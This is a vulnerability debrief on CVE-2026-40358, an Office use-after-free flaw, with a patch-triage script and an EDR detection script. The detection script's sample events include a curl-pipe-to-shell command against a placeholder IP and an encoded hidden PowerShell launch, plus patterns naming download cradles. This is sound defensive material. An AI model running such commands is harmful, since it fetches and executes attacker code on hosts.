PatchSiren cyber security CVE debrief

CVE-2026-40358 Microsoft CVE debrief

A use-after-free vulnerability in Microsoft Office allows an unauthorized attacker to execute code locally. NVD published the record on 2026-05-12 and last modified it on 2026-05-19; Microsoft has issued a vendor advisory. Affected products are Microsoft 365 Apps for Enterprise (x64 and x86), Office 2016, Office 2019, and Office Long Term Servicing Channel (LTSC) 2021 and 2024 on Windows (x64/x86) and macOS. The flaw is classified as CWE-416 (Use After Free) and scored CVSS 3.1 8.4 (HIGH): local attack vector, low attack complexity, no privileges required, no user interaction, and high impact on confidentiality, integrity and availability.

Vendor: Microsoft
Product: Microsoft 365 Apps for Enterprise
CVSS: HIGH 8.4
CISA KEV: Not listed in stored evidence
Original CVE published: 2026-05-12
Original CVE updated: 2026-05-19
Advisory published: 2026-05-12
Advisory updated: 2026-05-19

Who should care

Organizations running Microsoft Office 2016, Office 2019, Microsoft 365 Apps for Enterprise, or Office LTSC 2021/2024 on Windows or macOS endpoints; the security teams responsible for endpoint protection and patch management; and the IT administrators who manage those Office deployments.

Technical summary

This vulnerability is a use-after-free memory corruption (CWE-416) in Microsoft Office components. The CVSS 3.1 vector (AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) says the flaw is reachable locally, with low complexity, without elevated privileges and without user interaction, and that successful exploitation gives the attacker code execution in the context of the Office application with full loss of confidentiality, integrity and availability. The local attack vector means the attacker must already be able to run code or supply input on the endpoint; the stored evidence does not describe the triggering input or the affected code path. The attack surface spans every supported deployment channel: the perpetual-licence versions (2016, 2019), the Long Term Servicing Channel releases (2021, 2024) and Microsoft 365 Apps for Enterprise, on both Windows (x64/x86) and macOS. The breadth of affected products together with the high impact is why patch deployment should be prioritized.

Defensive priority

HIGH

Recommended defensive actions

  • Apply security updates from Microsoft as referenced in the vendor advisory for CVE-2026-40358
  • Prioritize patching on systems running affected Office versions including Microsoft 365 Apps for Enterprise, Office 2016, Office 2019, and Office LTSC 2021/2024
  • Monitor Microsoft Security Response Center (MSRC) for additional guidance or updated patches
  • Review endpoint detection and response (EDR) telemetry for anomalous Office process behaviour: Office applications (WINWORD, EXCEL, POWERPNT, OUTLOOK) spawning command shells, script hosts or executables from user-writable directories is the usual sign that attacker code is running inside the application
  • Where patching is delayed, restrict who can log on to and run Office on sensitive systems (administrative and other high-value hosts); on Windows, the Microsoft Defender Attack Surface Reduction rule "Block all Office applications from creating child processes" limits what an exploited Office process can launch
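To turn the patch-prioritization advice above into something an administrator can run against an inventory export, here is an added Python triage script. It is not PatchSiren's or Microsoft's code. The affected-product names are the ones listed in this debrief; the minimum fixed build numbers are not on this page and must come from the MSRC advisory, so the values in SAMPLE_FIXED_BUILDS are hypothetical placeholders, and the Endpoint fields, product strings and hostnames are assumptions about what an inventory export looks like.

```python
"""Patch-priority triage for CVE-2026-40358 over an endpoint inventory.

Added example for this debrief, not PatchSiren's or Microsoft's code.
Affected-product names come from the debrief (NVD CPE criteria). Fixed build
numbers are NOT on the page: the ones below are hypothetical placeholders to be
replaced with the values in the MSRC advisory.
"""
from collections import defaultdict
from dataclasses import dataclass

# Product families named in the NVD CPE criteria for this CVE.
AFFECTED_PRODUCTS = frozenset({
    "Microsoft 365 Apps for Enterprise",
    "Office 2016",
    "Office 2019",
    "Office LTSC 2021",
    "Office LTSC 2024",
})

# Outcomes, from most to least urgent.
PATCH_NOW_RESTRICT = "patch-now-restrict"  # vulnerable AND sensitive host
PATCH_NOW = "patch-now"                    # vulnerable, fixed build known
UNKNOWN_FIX_LEVEL = "unknown-fix-level"    # affected product, no fixed build on file
PATCHED = "patched"
NOT_AFFECTED = "not-affected"


@dataclass(frozen=True)
class Endpoint:
    host: str
    product: str            # as exported by the inventory tool (assumed format)
    platform: str           # "windows" or "macos"
    version: str            # e.g. "16.0.18129.20158" (Windows) or "16.90.24102416" (macOS)
    sensitive: bool = False  # admin workstation, finance, jump host, ...


def parse_version(version: str) -> tuple[int, ...]:
    """Dotted Office build string -> tuple, so builds compare numerically.

    Plain string comparison would rank "16.0.9999.0" above "16.0.18129.0".
    """
    return tuple(int(part) for part in version.strip().split("."))


def assess(endpoint: Endpoint, fixed_builds: dict[tuple[str, str], str]) -> str:
    """Classify one endpoint. fixed_builds maps (product, platform) -> minimum fixed build."""
    if endpoint.product not in AFFECTED_PRODUCTS:
        return NOT_AFFECTED
    key = (endpoint.product, endpoint.platform)
    if key not in fixed_builds:
        # Affected product with no fix level recorded: fail closed, treat as vulnerable.
        return UNKNOWN_FIX_LEVEL
    if parse_version(endpoint.version) >= parse_version(fixed_builds[key]):
        return PATCHED
    return PATCH_NOW_RESTRICT if endpoint.sensitive else PATCH_NOW


def triage(endpoints, fixed_builds) -> dict[str, list[str]]:
    """Group hostnames by outcome; hosts in each group are sorted for stable reports."""
    groups: dict[str, list[str]] = defaultdict(list)
    for ep in endpoints:
        groups[assess(ep, fixed_builds)].append(ep.host)
    return {status: sorted(hosts) for status, hosts in groups.items()}


# Constructed sample inventory (hostnames and builds are made up).
SAMPLE_ENDPOINTS = [
    Endpoint("ws-fin-01", "Microsoft 365 Apps for Enterprise", "windows", "16.0.18129.20158", sensitive=True),
    Endpoint("ws-eng-07", "Microsoft 365 Apps for Enterprise", "windows", "16.0.18129.20158"),
    Endpoint("ws-eng-12", "Microsoft 365 Apps for Enterprise", "windows", "16.0.18130.20000"),
    Endpoint("srv-rds-02", "Office LTSC 2021", "windows", "16.0.14332.20000"),
    Endpoint("mac-des-03", "Office LTSC 2024", "macos", "16.90.24102416"),
    Endpoint("ws-ops-04", "LibreOffice", "windows", "24.8.2.1"),
]

# HYPOTHETICAL fixed builds: replace with the numbers from the MSRC advisory.
SAMPLE_FIXED_BUILDS = {
    ("Microsoft 365 Apps for Enterprise", "windows"): "16.0.18130.20000",
    ("Office LTSC 2021", "windows"): "16.0.14332.21000",
}

if __name__ == "__main__":
    for status, hosts in triage(SAMPLE_ENDPOINTS, SAMPLE_FIXED_BUILDS).items():
        print(f"{status:20} {', '.join(hosts)}")
```

The deliberate design choice is that an affected product whose fixed build is not on file is reported as "unknown-fix-level" rather than silently skipped, so a platform you forgot to look up (macOS in the sample) still shows up on the work list.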
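The EDR review item above is easier to act on with concrete logic, so here is an added Python detection pass over process-creation events. It is not PatchSiren's or any EDR vendor's rule. The page records no exploit details for CVE-2026-40358, so this encodes the generic post-exploitation pattern for Office memory-corruption bugs (an Office process spawning a shell, a script host, or a binary dropped in a user-writable directory), not a signature for this CVE. The JSON-lines event format, field names and sample events are constructed for the example.

```python
"""Flag Office processes spawning shells, script hosts or binaries from
user-writable paths, over EDR process-creation events.

Added example for this debrief, not PatchSiren's or any EDR vendor's rule.
Generic Office post-exploitation pattern, not a CVE-2026-40358 signature.
Event schema (host, parent_image, image, command_line) is constructed.
"""
import json
import re

OFFICE_PARENTS = {
    # Windows image names
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe", "onenote.exe",
    # macOS app-bundle executables
    "microsoft word", "microsoft excel", "microsoft powerpoint", "microsoft outlook",
}
SHELLS_AND_SCRIPT_HOSTS = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe",
    "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe", "msiexec.exe",
    "sh", "bash", "zsh", "osascript", "curl", "python3",
}
# Locations Office has no business launching executables from.
USER_WRITABLE = re.compile(
    r"(\\appdata\\local\\temp\\|\\downloads\\|\\users\\public\\|^/tmp/|/downloads/|/private/tmp/)",
    re.I,
)
# Download cradles and encoded PowerShell in the child's command line.
CMDLINE_INDICATORS = re.compile(
    r"(-enc(odedcommand)?\s|downloadstring|invoke-webrequest|\bcurl\b.*http|\bwget\b)", re.I
)


def basename(path: str) -> str:
    """Last path component, lower-cased, for either Windows or POSIX separators."""
    return re.split(r"[\\/]", path)[-1].lower()


def classify(event: dict):
    """Return a list of reasons the event is suspicious, or None if it is not."""
    parent = basename(event.get("parent_image", ""))
    if parent not in OFFICE_PARENTS:
        return None
    image = event.get("image", "")
    child = basename(image)
    reasons = []
    if child in SHELLS_AND_SCRIPT_HOSTS:
        reasons.append(f"office parent {parent} spawned {child}")
    if USER_WRITABLE.search(image):
        reasons.append("child image in user-writable path")
    if CMDLINE_INDICATORS.search(event.get("command_line", "")):
        reasons.append("download/encoded-command indicator in command line")
    return reasons or None


def detect(lines):
    """Run classify over JSON-lines events; malformed or blank lines are skipped."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        reasons = classify(event)
        if reasons:
            alerts.append({
                "host": event.get("host"),
                "parent": basename(event.get("parent_image", "")),
                "child": basename(event.get("image", "")),
                "reasons": reasons,
            })
    return alerts


# Constructed sample events: two Windows hits, one benign print spooler child,
# one non-Office parent, one macOS hit, and one malformed line.
SAMPLE_EVENTS = r'''
{"host": "ws-eng-07", "parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "image": "C:\\Windows\\System32\\cmd.exe", "command_line": "cmd.exe /c powershell -nop -w hidden -enc SQBFAFgAIAAo"}
{"host": "ws-fin-01", "parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "image": "C:\\Users\\alice\\AppData\\Local\\Temp\\update.exe", "command_line": "update.exe"}
{"host": "ws-eng-12", "parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "image": "C:\\Windows\\System32\\splwow64.exe", "command_line": "splwow64.exe"}
{"host": "ws-ops-04", "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\cmd.exe", "command_line": "cmd.exe"}
{"host": "mac-des-03", "parent_image": "/Applications/Microsoft Word.app/Contents/MacOS/Microsoft Word", "image": "/bin/sh", "command_line": "/bin/sh -c curl -fsSL http://198.51.100.7/x | sh"}
this line is not json
'''.splitlines()

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["host"], alert["parent"], "->", alert["child"], "|", "; ".join(alert["reasons"]))
```

The benign case (WINWORD launching splwow64.exe for printing) is included on purpose: a rule that alerts on every Office child process drowns the analyst, so the logic requires the child to be a shell or script host, live in a user-writable path, or carry a download or encoded-command indicator.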

Evidence notes

Vulnerability description and CVSS scoring derived from NVD official record. Affected product list compiled from NVD CPE criteria. CWE-416 classification and vendor advisory reference confirmed via NVD source metadata. Timeline dates sourced from NVD published and modified timestamps.

Official resources

Microsoft vendor advisory for CVE-2026-40358, published 2026-05-12 (URL not retained in stored evidence)